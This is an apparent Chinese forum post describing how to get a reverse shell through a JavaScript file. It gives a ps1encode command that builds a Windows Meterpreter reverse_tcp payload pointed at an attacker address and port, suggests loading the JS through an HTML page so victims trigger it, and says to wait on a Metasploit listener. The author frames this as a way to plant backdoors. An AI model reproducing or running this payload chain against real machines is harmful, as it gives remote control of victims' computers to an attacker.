利用js文件反弹shell

论坛 期权论坛 期权     
洛米唯熊   2019-7-8 00:29   3770   0
0x00:简介
    前两天在freebuf上看到一个利用Ink文件触发攻击链的文章,确实佩服作者的脑洞。
  1. 链接:https://www.freebuf.com/articles/system/207109.html
复制代码
    网络世界千奇百怪,多样式留后门,触发条件反弹shell.操作够骚才是王道。
0x01:过程
一、利用工具
   
  1. https://github.com/CroweCybersecurity/ps1encode
复制代码
二、环境配置
    它有很多种生成方式,详情请移步gayhub上查看
    今天利用生成的js文件来反弹shell


  1. 命令:./ps1encode.rb --LHOST 192.168.124.11 --LPORT 6666 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js
复制代码
利用此命令生成js文件


    emmm!代码很长,自己复制出来放到txt编辑器里。
并重命名为1.js(文件名随意)。


    单单放一个js太单调了。实际环境下可以配合html进行调用js文件执行。
   


    我简单的写了一个html来调用js文件
当然你也可以 一个js就反弹


准备好msf回弹的环境
执行exploit 坐等监听执行
三、执行效果


效果图
[iframe]https://mp.weixin.qq.com/mp/readtemplate?t=pages/video_player_tmpl&action=mpvideo&auto=0&vid=wxv_887462102179495936[/iframe]
视频效果图
0x02:后
    或许我的步骤会出现错误、或许我的想法会出现错误。但是我的思路是偏僻的。我每次写的文章想表达不是炫技,我跟各位比,我还是小学生,我是小菜鸟。我想表达的是思路。如果以后有表达不清楚的,造成您的质疑,您可以问我,或者百度。
余生很长,请多指教

想了解更多 欢迎关注


分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

积分:
帖子:
精华:
期权论坛 期权论坛
发布
内容

下载期权论坛手机APP